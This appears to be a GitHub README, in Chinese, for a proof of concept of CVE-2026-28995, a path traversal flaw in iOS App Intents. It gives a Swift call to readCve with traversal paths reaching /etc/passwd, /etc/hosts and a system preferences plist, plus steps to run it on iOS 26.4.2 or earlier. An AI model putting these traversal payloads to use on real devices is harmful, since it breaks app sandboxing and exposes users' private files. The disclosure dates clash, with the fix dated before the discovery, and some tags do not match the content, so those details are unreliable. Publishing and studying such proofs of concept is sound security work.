Robertmak2014-sudow/CVE-2026-28995

GitHub: Robertmak2014-sudow/CVE-2026-28995

iOS App Intents 路径遍历漏洞(CVE-2026-28995)的概念验证代码,演示了突破应用沙盒读取任意文件的方法。

Stars: 0 | Forks: 0

# CVE-2026-28995 **CVE-2026-28995 的概念验证** — iOS 26.4.2 及以下版本中 App Intents 的路径遍历漏洞。 ## 描述 该漏洞允许恶意应用通过 App Intents 读取其沙盒外的**任意文件**。根本原因是 Apple 的 App Intents 框架对路径的验证不足。 **受影响版本:** iOS 26.4.2 及以下版本 **修复版本:** iOS 26.5(2026 年 5 月 11 日) ## 使用方法 ### 1. 函数 `readCve(path: String) -> String` ``` let intent = CVE_2026_28995() let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd") print(content) ``` 2. 路径示例 Path 读取内容 ../../../../../../../../../../../../../etc/passwd 用户密码 ../../../../../../../../../../../../../etc/hosts 主机文件 ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist 系统偏好设置 3. 目录处理 如果路径指向一个目录,该函数将返回: [DIRECTORY] 内容: file1.txt file2.jpg folder/ 运行方式 在 Xcode 中创建一个 iOS 项目。 将 CVE-2026-28995.swift 添加到项目中。 使用目标路径调用 readCve(path:)。 在 iOS 26.4.2 或更早版本上运行。 负责任的披露 发现日期:2026 年 7 月 1 日 修复版本:iOS 26.5(2026 年 5 月 11 日)
标签:HTTP工具, iOS, PoC, 安全漏洞, 暴力破解, 网络安全审计, 路径遍历